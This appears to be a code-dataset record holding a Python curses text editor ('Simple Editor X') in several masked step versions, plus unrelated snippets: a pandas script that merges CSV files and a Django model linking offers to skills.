init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch() # get the key pressed after cmd or alt
if char == KEY_LEFT or char == 98: # 98 and 102 are left and right keys produced while pressing alt, on mac terminal
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102: # CMD + RIGHT
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE: # CMD + DELETE
cursor.deleteWholeLine()
elif char == KEY_DOWN: # CMD + DOWN
cursor.moveToRightBottomMost()
elif char == KEY_UP: # CMD + UP
cursor.moveToRightUpMost()
else: # in case char user press ESC, it produce the same effec as CMD or ALT, but that's not what we want
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, "Quit and Save (ENTER)")
screen.addstr(y + 1, x, "Quit (F9)")
screen.addstr(y + 2, x, "Go Back (Any Key)")
screen.refresh()
def printExitMessage(exit_code, error_msg):
if exit_code == -1:
printToTerminal("Shit just happen, sorry.")
if error_msg:
printToTerminal(error_msg)
elif exit_code == 1:
printToTerminal("Quit, safe and sound.")
elif exit_code == 2:
printToTerminal("Quit without save.")
elif exit_code == 3:
printToTerminal("saved !")
elif exit_code == 4: # -version
printToTerminal(VERSION)
elif exit_code == 5: # -help
printToTerminal("======================== Welcome to Simple Editor X ========================", "GREEN")
printToTerminal("")
printToTerminal("Arguments:")
printToTerminal(" -version")
printToTerminal(" -help")
printToTerminal(" {file_name}, to start editing an existing or create a new file")
printToTerminal("")
printToTerminal("While using:")
printToTerminal(" Press F1, then ENTER to save")
printToTerminal("")
if __name__== "__main__":
if len(sys.argv) != 2:
printToTerminal("This application take exactly 1 argument")
printToTerminal("type: 'sex -help' for more details")
exit(69)
error_msg = ""
exit_code = -1
arg = sys.argv[1].lower()
file_path = sys.argv[1]
if arg == "-v" or arg == "-version":
exit_code = 4
elif arg == "-h" or arg == "-help":
exit_code = 5
else:
exit_code, error_msg = wrapper(main, file_path)
printExitMessage(exit_code, error_msg)
|
flexible
|
{
"blob_id": "7a6d45ef87d93af9a15bd352b893164d3a36c399",
"index": 7545,
"step-1": "<mask token>\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt:\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch()\n if char == KEY_LEFT or char == 98:\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102:\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE:\n cursor.deleteWholeLine()\n elif char == KEY_DOWN:\n cursor.moveToRightBottomMost()\n elif char == KEY_UP:\n cursor.moveToRightUpMost()\n else:\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, 'Quit and Save (ENTER)')\n screen.addstr(y + 1, x, 'Quit (F9)')\n screen.addstr(y + 2, x, 'Go Back (Any Key)')\n screen.refresh()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt:\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch()\n if char == KEY_LEFT or char == 98:\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102:\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE:\n cursor.deleteWholeLine()\n elif char == KEY_DOWN:\n cursor.moveToRightBottomMost()\n elif char == KEY_UP:\n cursor.moveToRightUpMost()\n else:\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, 'Quit and Save (ENTER)')\n screen.addstr(y + 1, x, 'Quit (F9)')\n screen.addstr(y + 2, x, 'Go Back (Any Key)')\n screen.refresh()\n\n\ndef printExitMessage(exit_code, error_msg):\n if exit_code == -1:\n printToTerminal('Shit just happen, sorry.')\n if error_msg:\n printToTerminal(error_msg)\n elif exit_code == 1:\n printToTerminal('Quit, safe and sound.')\n elif exit_code == 2:\n printToTerminal('Quit without save.')\n elif exit_code == 3:\n printToTerminal('saved !')\n elif exit_code == 4:\n printToTerminal(VERSION)\n elif exit_code == 5:\n printToTerminal(\n '======================== Welcome to Simple Editor X ========================'\n , 'GREEN')\n printToTerminal('')\n printToTerminal('Arguments:')\n printToTerminal(' -version')\n printToTerminal(' -help')\n printToTerminal(\n ' {file_name}, to start editing an existing or create a new file'\n )\n printToTerminal('')\n printToTerminal('While using:')\n printToTerminal(' Press F1, then ENTER to save')\n printToTerminal('')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt:\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch()\n if char == KEY_LEFT or char == 98:\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102:\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE:\n cursor.deleteWholeLine()\n elif char == KEY_DOWN:\n cursor.moveToRightBottomMost()\n elif char == KEY_UP:\n cursor.moveToRightUpMost()\n else:\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, 'Quit and Save (ENTER)')\n screen.addstr(y + 1, x, 'Quit (F9)')\n screen.addstr(y + 2, x, 'Go Back (Any Key)')\n screen.refresh()\n\n\ndef printExitMessage(exit_code, error_msg):\n if exit_code == -1:\n printToTerminal('Shit just happen, sorry.')\n if error_msg:\n printToTerminal(error_msg)\n elif exit_code == 1:\n printToTerminal('Quit, safe and sound.')\n elif exit_code == 2:\n printToTerminal('Quit without save.')\n elif exit_code == 3:\n printToTerminal('saved !')\n elif exit_code == 4:\n printToTerminal(VERSION)\n elif exit_code == 5:\n printToTerminal(\n '======================== Welcome to Simple Editor X ========================'\n , 'GREEN')\n printToTerminal('')\n printToTerminal('Arguments:')\n printToTerminal(' -version')\n printToTerminal(' -help')\n printToTerminal(\n ' {file_name}, to start editing an existing or create a new file'\n )\n printToTerminal('')\n printToTerminal('While using:')\n printToTerminal(' Press F1, then ENTER to save')\n printToTerminal('')\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n printToTerminal('This application take exactly 1 argument')\n printToTerminal(\"type: 'sex -help' for more details\")\n exit(69)\n error_msg = ''\n exit_code = -1\n arg = sys.argv[1].lower()\n file_path = sys.argv[1]\n if arg == '-v' or arg == '-version':\n exit_code = 4\n elif arg == '-h' or arg == '-help':\n exit_code = 5\n else:\n exit_code, error_msg = wrapper(main, file_path)\n printExitMessage(exit_code, error_msg)\n",
"step-4": "import sys\nimport os\nimport traceback\nfrom src.properties import *\nfrom src.utils import *\nfrom subprocess import call\nfrom src.entity.cursor import Cursor\nfrom curses import *\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt:\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch()\n if char == KEY_LEFT or char == 98:\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102:\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE:\n cursor.deleteWholeLine()\n elif char == KEY_DOWN:\n cursor.moveToRightBottomMost()\n elif char == KEY_UP:\n cursor.moveToRightUpMost()\n else:\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, 'Quit and Save (ENTER)')\n screen.addstr(y + 1, x, 'Quit (F9)')\n screen.addstr(y + 2, x, 'Go Back (Any Key)')\n screen.refresh()\n\n\ndef printExitMessage(exit_code, error_msg):\n if exit_code == -1:\n printToTerminal('Shit just happen, sorry.')\n if error_msg:\n printToTerminal(error_msg)\n elif exit_code == 1:\n printToTerminal('Quit, safe and sound.')\n elif exit_code == 2:\n printToTerminal('Quit without save.')\n elif exit_code == 3:\n printToTerminal('saved !')\n elif exit_code == 4:\n printToTerminal(VERSION)\n elif exit_code == 5:\n printToTerminal(\n '======================== Welcome to Simple Editor X ========================'\n , 'GREEN')\n printToTerminal('')\n printToTerminal('Arguments:')\n printToTerminal(' -version')\n printToTerminal(' -help')\n printToTerminal(\n ' {file_name}, to start editing an existing or create a new file'\n )\n printToTerminal('')\n printToTerminal('While using:')\n printToTerminal(' Press F1, then ENTER to save')\n printToTerminal('')\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n printToTerminal('This application take exactly 1 argument')\n printToTerminal(\"type: 'sex -help' for more details\")\n exit(69)\n error_msg = ''\n exit_code = -1\n arg = sys.argv[1].lower()\n file_path = sys.argv[1]\n if arg == '-v' or arg == '-version':\n exit_code = 4\n elif arg == '-h' or arg == '-help':\n exit_code = 5\n else:\n exit_code, error_msg = wrapper(main, file_path)\n printExitMessage(exit_code, error_msg)\n",
"step-5": "import sys\nimport os\nimport traceback\nfrom src.properties import *\nfrom src.utils import *\nfrom subprocess import call\nfrom src.entity.cursor import Cursor\nfrom curses import *\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt: # quit properly, when user press Ctrl + C\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch() # get the key pressed after cmd or alt\n if char == KEY_LEFT or char == 98: # 98 and 102 are left and right keys produced while pressing alt, on mac terminal\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102: # CMD + RIGHT\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE: # CMD + DELETE\n cursor.deleteWholeLine()\n elif char == KEY_DOWN: # CMD + DOWN\n cursor.moveToRightBottomMost()\n elif char == KEY_UP: # CMD + UP\n cursor.moveToRightUpMost()\n else: # in case char user press ESC, it produce the same effec as CMD or ALT, but that's not what we want\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, \"Quit and Save (ENTER)\")\n screen.addstr(y + 1, x, \"Quit (F9)\")\n screen.addstr(y + 2, x, \"Go Back (Any Key)\")\n screen.refresh()\n\n\ndef printExitMessage(exit_code, error_msg):\n if exit_code == -1:\n printToTerminal(\"Shit just happen, sorry.\")\n if error_msg:\n printToTerminal(error_msg)\n elif exit_code == 1:\n printToTerminal(\"Quit, safe and sound.\")\n elif exit_code == 2:\n printToTerminal(\"Quit without save.\")\n elif exit_code == 3:\n printToTerminal(\"saved !\")\n elif exit_code == 4: # -version\n printToTerminal(VERSION)\n elif exit_code == 5: # -help\n printToTerminal(\"======================== Welcome to Simple Editor X ========================\", \"GREEN\")\n printToTerminal(\"\")\n printToTerminal(\"Arguments:\")\n printToTerminal(\" -version\")\n printToTerminal(\" -help\")\n printToTerminal(\" {file_name}, to start editing an existing or create a new file\")\n printToTerminal(\"\")\n printToTerminal(\"While using:\")\n printToTerminal(\" Press F1, then ENTER to save\")\n printToTerminal(\"\")\n\n\nif __name__== \"__main__\":\n if len(sys.argv) != 2:\n printToTerminal(\"This application take exactly 1 argument\")\n printToTerminal(\"type: 'sex -help' for more details\")\n exit(69)\n error_msg = \"\"\n exit_code = -1\n arg = sys.argv[1].lower()\n file_path = sys.argv[1]\n if arg == \"-v\" or arg == \"-version\":\n exit_code = 4\n elif arg == \"-h\" or arg == \"-help\":\n exit_code = 5\n else:\n exit_code, error_msg = wrapper(main, file_path)\n\n printExitMessage(exit_code, error_msg)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for classf in classes:
PWD = os.getcwd() + '/' + classf + '/'
currentdname = os.path.basename(os.getcwd())
csvfiles = glob.glob(PWD + '/*.csv')
df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])
if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):
print('csv file already exists.')
continue
for csvfile in csvfiles:
csvname = os.path.basename(csvfile)
df_each = pd.read_csv(csvfile, index_col=0)
df = df.append(df_each, ignore_index=True)
df.to_csv(PWD + classf + '_' + currentdname + '.csv')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
classes = os.listdir(os.getcwd())
for classf in classes:
PWD = os.getcwd() + '/' + classf + '/'
currentdname = os.path.basename(os.getcwd())
csvfiles = glob.glob(PWD + '/*.csv')
df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])
if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):
print('csv file already exists.')
continue
for csvfile in csvfiles:
csvname = os.path.basename(csvfile)
df_each = pd.read_csv(csvfile, index_col=0)
df = df.append(df_each, ignore_index=True)
df.to_csv(PWD + classf + '_' + currentdname + '.csv')
<|reserved_special_token_1|>
import os
import glob
import pandas as pd
classes = os.listdir(os.getcwd())
for classf in classes:
PWD = os.getcwd() + '/' + classf + '/'
currentdname = os.path.basename(os.getcwd())
csvfiles = glob.glob(PWD + '/*.csv')
df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])
if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):
print('csv file already exists.')
continue
for csvfile in csvfiles:
csvname = os.path.basename(csvfile)
df_each = pd.read_csv(csvfile, index_col=0)
df = df.append(df_each, ignore_index=True)
df.to_csv(PWD + classf + '_' + currentdname + '.csv')
<|reserved_special_token_1|>
import os
import glob
import pandas as pd
classes = os.listdir(os.getcwd())
for classf in classes:
#if os.path.isfile(classf) or classf == 'LAST':
#continue
PWD = os.getcwd() + "/" + classf + "/"
currentdname = os.path.basename(os.getcwd())
csvfiles=glob.glob(PWD + "/*.csv")
df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])
if os.path.exists(PWD + classf + "_" + currentdname + ".csv"):
print('csv file already exists.')
continue
for csvfile in csvfiles:
csvname = os.path.basename(csvfile)
df_each = pd.read_csv(csvfile, index_col=0)
df = df.append(df_each, ignore_index=True)
df.to_csv(PWD + classf + "_" + currentdname + ".csv")
|
flexible
|
{
"blob_id": "3ebd455056f168f8f69b9005c643c519e5d0b436",
"index": 8286,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor classf in classes:\n PWD = os.getcwd() + '/' + classf + '/'\n currentdname = os.path.basename(os.getcwd())\n csvfiles = glob.glob(PWD + '/*.csv')\n df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])\n if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):\n print('csv file already exists.')\n continue\n for csvfile in csvfiles:\n csvname = os.path.basename(csvfile)\n df_each = pd.read_csv(csvfile, index_col=0)\n df = df.append(df_each, ignore_index=True)\n df.to_csv(PWD + classf + '_' + currentdname + '.csv')\n",
"step-3": "<mask token>\nclasses = os.listdir(os.getcwd())\nfor classf in classes:\n PWD = os.getcwd() + '/' + classf + '/'\n currentdname = os.path.basename(os.getcwd())\n csvfiles = glob.glob(PWD + '/*.csv')\n df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])\n if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):\n print('csv file already exists.')\n continue\n for csvfile in csvfiles:\n csvname = os.path.basename(csvfile)\n df_each = pd.read_csv(csvfile, index_col=0)\n df = df.append(df_each, ignore_index=True)\n df.to_csv(PWD + classf + '_' + currentdname + '.csv')\n",
"step-4": "import os\nimport glob\nimport pandas as pd\nclasses = os.listdir(os.getcwd())\nfor classf in classes:\n PWD = os.getcwd() + '/' + classf + '/'\n currentdname = os.path.basename(os.getcwd())\n csvfiles = glob.glob(PWD + '/*.csv')\n df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])\n if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):\n print('csv file already exists.')\n continue\n for csvfile in csvfiles:\n csvname = os.path.basename(csvfile)\n df_each = pd.read_csv(csvfile, index_col=0)\n df = df.append(df_each, ignore_index=True)\n df.to_csv(PWD + classf + '_' + currentdname + '.csv')\n",
"step-5": "import os\nimport glob\nimport pandas as pd\n\nclasses = os.listdir(os.getcwd())\n\nfor classf in classes:\n\t#if os.path.isfile(classf) or classf == 'LAST':\n\t\t#continue\n\t\t\n\tPWD = os.getcwd() + \"/\" + classf + \"/\"\n\tcurrentdname = os.path.basename(os.getcwd())\n\tcsvfiles=glob.glob(PWD + \"/*.csv\")\n\t\n\tdf = pd.DataFrame(columns=['image', 'x', 'y', 'num'])\n\t\n\tif os.path.exists(PWD + classf + \"_\" + currentdname + \".csv\"):\n\t\tprint('csv file already exists.')\n\t\tcontinue\n\t\n\tfor csvfile in csvfiles:\n\t\tcsvname = os.path.basename(csvfile)\n\t\tdf_each = pd.read_csv(csvfile, index_col=0)\n\t\tdf = df.append(df_each, ignore_index=True)\n\t\t\n\tdf.to_csv(PWD + classf + \"_\" + currentdname + \".csv\")\n\t\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from xai.brain.wordbase.verbs._hinder import _HINDER
#calss header
class _HINDERED(_HINDER, ):
def __init__(self,):
_HINDER.__init__(self)
self.name = "HINDERED"
self.specie = 'verbs'
self.basic = "hinder"
self.jsondata = {}
|
normal
|
{
"blob_id": "420beba5b6fd575ab9be0c907ae0698ba7be5220",
"index": 4622,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass _HINDERED(_HINDER):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass _HINDERED(_HINDER):\n\n def __init__(self):\n _HINDER.__init__(self)\n self.name = 'HINDERED'\n self.specie = 'verbs'\n self.basic = 'hinder'\n self.jsondata = {}\n",
"step-4": "from xai.brain.wordbase.verbs._hinder import _HINDER\n\n\nclass _HINDERED(_HINDER):\n\n def __init__(self):\n _HINDER.__init__(self)\n self.name = 'HINDERED'\n self.specie = 'verbs'\n self.basic = 'hinder'\n self.jsondata = {}\n",
"step-5": "\n\nfrom xai.brain.wordbase.verbs._hinder import _HINDER\n\n#calss header\nclass _HINDERED(_HINDER, ):\n\tdef __init__(self,): \n\t\t_HINDER.__init__(self)\n\t\tself.name = \"HINDERED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"hinder\"\n\t\tself.jsondata = {}\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import rasterio as rio
from affine import Affine
colour_data = []
def generate_colour_data(width, height, imagiry_data, pixel2coord):
"""Extract color data from the .tiff file """
for i in range(1, height):
for j in range(1, width):
colour_data.append(
[
pixel2coord(j, i)[0],
pixel2coord(j, i)[1],
imagiry_data.read([1])[0][i - 1][j - 1],
]
)
#Code that will extract the width, height and transformation information of the .tiff file and pass it to the function
# generate_colour_data which will populate the color data in a list in the following format: [longitude, latitude, Red, Green, Blue, Alpha]
with rio.open(r'C:\Users\user.DESKTOP-OMQ89VA\Documents\USGS-LIDAR-\data\iowa.tif') as imagery_data:
T0 = imagery_data.transform
T1 = T0 * Affine.translation(0.5, 0.5)
pixel2coord = lambda c, r: (c, r) * T1
width = imagery_data.width
height = imagery_data.height
generate_colour_data(width, height, imagery_data, pixel2coord)
|
normal
|
{
"blob_id": "7e8b192e77e857f1907d5272d03c1138a10c61f4",
"index": 4803,
"step-1": "<mask token>\n\n\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append([pixel2coord(j, i)[0], pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1]])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append([pixel2coord(j, i)[0], pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1]])\n\n\nwith rio.open(\n 'C:\\\\Users\\\\user.DESKTOP-OMQ89VA\\\\Documents\\\\USGS-LIDAR-\\\\data\\\\iowa.tif'\n ) as imagery_data:\n T0 = imagery_data.transform\n T1 = T0 * Affine.translation(0.5, 0.5)\n pixel2coord = lambda c, r: (c, r) * T1\n width = imagery_data.width\n height = imagery_data.height\n generate_colour_data(width, height, imagery_data, pixel2coord)\n",
"step-3": "<mask token>\ncolour_data = []\n\n\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append([pixel2coord(j, i)[0], pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1]])\n\n\nwith rio.open(\n 'C:\\\\Users\\\\user.DESKTOP-OMQ89VA\\\\Documents\\\\USGS-LIDAR-\\\\data\\\\iowa.tif'\n ) as imagery_data:\n T0 = imagery_data.transform\n T1 = T0 * Affine.translation(0.5, 0.5)\n pixel2coord = lambda c, r: (c, r) * T1\n width = imagery_data.width\n height = imagery_data.height\n generate_colour_data(width, height, imagery_data, pixel2coord)\n",
"step-4": "import rasterio as rio\nfrom affine import Affine\ncolour_data = []\n\n\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append([pixel2coord(j, i)[0], pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1]])\n\n\nwith rio.open(\n 'C:\\\\Users\\\\user.DESKTOP-OMQ89VA\\\\Documents\\\\USGS-LIDAR-\\\\data\\\\iowa.tif'\n ) as imagery_data:\n T0 = imagery_data.transform\n T1 = T0 * Affine.translation(0.5, 0.5)\n pixel2coord = lambda c, r: (c, r) * T1\n width = imagery_data.width\n height = imagery_data.height\n generate_colour_data(width, height, imagery_data, pixel2coord)\n",
"step-5": "import rasterio as rio\nfrom affine import Affine\n\ncolour_data = []\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append(\n [\n pixel2coord(j, i)[0],\n pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1],\n \n ]\n )\n#Code that will extract the width, height and transformation information of the .tiff file and pass it to the function \n# generate_colour_data which will populate the color data in a list in the following format: [longitude, latitude, Red, Green, Blue, Alpha]\nwith rio.open(r'C:\\Users\\user.DESKTOP-OMQ89VA\\Documents\\USGS-LIDAR-\\data\\iowa.tif') as imagery_data:\n T0 = imagery_data.transform\n T1 = T0 * Affine.translation(0.5, 0.5)\n pixel2coord = lambda c, r: (c, r) * T1\n width = imagery_data.width\n height = imagery_data.height\n \n generate_colour_data(width, height, imagery_data, pixel2coord)\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OfferRequirement(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OfferRequirement(models.Model):
skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING, default='')
offer = models.ForeignKey(Offer, on_delete=models.CASCADE, default='')
<|reserved_special_token_1|>
from django.db import models
from skills.models import skill
from offres.models import Offer
class OfferRequirement(models.Model):
